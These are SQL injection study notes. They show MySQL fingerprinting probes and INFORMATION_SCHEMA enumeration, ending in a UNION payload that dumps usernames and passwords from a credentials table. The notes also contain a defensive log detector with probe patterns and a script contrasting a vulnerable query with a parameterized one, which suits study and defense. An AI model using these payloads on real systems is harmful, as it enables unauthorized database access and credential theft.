MySQL Fingerprinting
If the web server is using Apache or Nginx, it is a good guess that the web server is using something like MySQL.
If the web server is using IIS, DBMS could be MSSQL.
Let's try fingerprinting the MySQL database:
| Payload | When to Use | Expected Output | Wrong Output |
|---|---|---|---|
| `SELECT @@version` | When we have full query output | MySQL version string, e.g. `10.3.22-MariaDB-1ubuntu1` | In MSSQL it returns the MSSQL version. Error with other DBMS. |
| `SELECT POW(1,1)` | When we only have numeric output | `1` | Error with other DBMS |
| `SELECT SLEEP(5)` | Blind / no output | Delays the page response for 5 seconds and returns `0` | Will not delay the response with other DBMS |
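From the defending side, the three probes in the table are easy to spot in web server logs because they carry distinctive tokens (`@@version`, `POW(`, `SLEEP(`) and usually arrive inside a `UNION select`. The following detector is an added example, not part of the original notes: the log lines are constructed, the parameter name `port_code` and the endpoint `/search.php` are assumed, and the probe patterns cover the payloads shown on this page plus the `INFORMATION_SCHEMA` enumeration queries that follow.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical detector (added example). Each pattern corresponds to one of the
# probes discussed in the notes; matching is case-insensitive.
PROBES = {
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "numeric_probe": re.compile(r"\bpow\s*\(", re.I),
    "time_probe": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "schema_enum": re.compile(r"information_schema\.(schemata|tables|columns)", re.I),
    "union_select": re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I),
}

# Extracts the request path and query string from a common-log-format line.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+?)(?:\?(?P<qs>\S*))? HTTP/')


def normalize(value: str) -> str:
    """URL-decode until the value stops changing, so nested encoding is inspected in its final form."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value


def classify(query_string: str) -> list[str]:
    """Return the names of the probe patterns present in a URL query string."""
    text = normalize(query_string)
    return [name for name, pattern in PROBES.items() if pattern.search(text)]


def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, matched_probe_names) for every log line that carries a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m or not m.group("qs"):
            continue
        found = classify(m.group("qs"))
        if found:
            hits.append((line.split()[0], found))
    return hits


# Constructed sample log (not real traffic): one benign request followed by the
# version, time-based and schema-enumeration probes from the notes, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?port_code=cn HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?port_code=cn%27%20UNION%20select%201%2C%40%40version%2C3%2C4--%20- HTTP/1.1" 200 734
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?port_code=cn%27%20UNION%20select%201%2Csleep(5)%2C3%2C4--%20- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?port_code=cn%27%20UNION%20select%201%2CTABLE_NAME%2CTABLE_SCHEMA%2C4%20from%20INFORMATION_SCHEMA.TABLES--%20- HTTP/1.1" 200 901
"""

if __name__ == "__main__":
    for ip, probes in scan_log(SAMPLE_LOG):
        print(f"{ip}: {', '.join(probes)}")
```

The decode loop matters: a single `unquote_plus` would leave a double-encoded `%2527` as `%27`, and the quote that opens the injection would never be seen by the patterns. A real deployment would also inspect POST bodies and headers, since the page parameter is not the only place user input reaches a query.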
Information_schema Database
The INFORMATION_SCHEMA database contains metadata about the databases and tables present on the server.
To reference a table present in another database, we use the `.` operator, e.g. to SELECT from a table `users` present in a database named `my_database`:
```sql
SELECT * FROM my_database.users;
```
SCHEMATA
The SCHEMATA table in the INFORMATION_SCHEMA database contains information about all databases on the server.
```
mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
+--------------------+
| SCHEMA_NAME        |
+--------------------+
| mysql              |
| information_schema |
| performance_schema |
| ilfreight          |
| dev                |
+--------------------+
6 rows in set (0.01 sec)
```
To find out about the current database:
```sql
cn' UNION select 1,database(),2,3-- -
```
Tables
Before we dump data from the database, we need a list of its tables so we can query them with a SELECT statement. The INFORMATION_SCHEMA.TABLES table has two columns of interest:
- `TABLE_SCHEMA`: points to the database each table (and its columns) belongs to
- `TABLE_NAME`: stores the table name
```sql
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
```
Columns
```sql
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
```
Data
```sql
cn' UNION select 1, username, password, 4 from dev.credentials-- -
```
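The whole chain above only works because the application concatenates the `port_code` value into the SQL text. The script below is an added example, not code from the original notes: it shows the vulnerable query beside its parameterized form and runs the final `dev.credentials` payload through both. SQLite stands in for MySQL so it runs offline (the payload uses only standard SQL: `UNION`, a `--` comment and `db.table` references, so it behaves the same), the table layout and the `dev` database name are assumed, and the credential row is constructed.

```python
import sqlite3

# Added example. A second in-memory database is attached under the name "dev" so
# the cross-database reference dev.credentials from the notes resolves here too.
SCHEMA = """
CREATE TABLE ports (id INTEGER, code TEXT, city TEXT, volume INTEGER);
INSERT INTO ports VALUES (1, 'cn', 'Shanghai', 100);
ATTACH DATABASE ':memory:' AS dev;
CREATE TABLE dev.credentials (id INTEGER, username TEXT, password TEXT);
INSERT INTO dev.credentials VALUES (1, 'admin', 'constructed-secret');
"""

# The last payload from the notes, exactly as it would arrive in port_code.
PAYLOAD = "cn' UNION select 1, username, password, 4 from dev.credentials-- -"


def build_db() -> sqlite3.Connection:
    """Create the constructed sample database in memory."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_vulnerable(con: sqlite3.Connection, port_code: str) -> list[tuple]:
    """Vulnerable: user input is spliced into the SQL text.

    A quote in port_code closes the string literal and everything after it is
    parsed as SQL, so the UNION pulls rows out of dev.credentials.
    """
    sql = f"SELECT id, code, city, volume FROM ports WHERE code = '{port_code}'"
    return con.execute(sql).fetchall()


def search_parameterized(con: sqlite3.Connection, port_code: str) -> list[tuple]:
    """Hardened: the value is bound as a parameter.

    The SQL text never changes; port_code is compared as one string literal,
    so the same payload simply matches no port code and returns nothing.
    """
    sql = "SELECT id, code, city, volume FROM ports WHERE code = ?"
    return con.execute(sql, (port_code,)).fetchall()


if __name__ == "__main__":
    con = build_db()
    print("vulnerable  :", search_vulnerable(con, PAYLOAD))
    print("parameterized:", search_parameterized(con, PAYLOAD))
```

Parameterization removes the injection; as a second layer, the application's database account should have privileges only on its own schema. MySQL's INFORMATION_SCHEMA only lists objects the current account has some privilege on, so with a properly scoped account the `where table_schema='dev'` query above would return nothing even if an injection point remained.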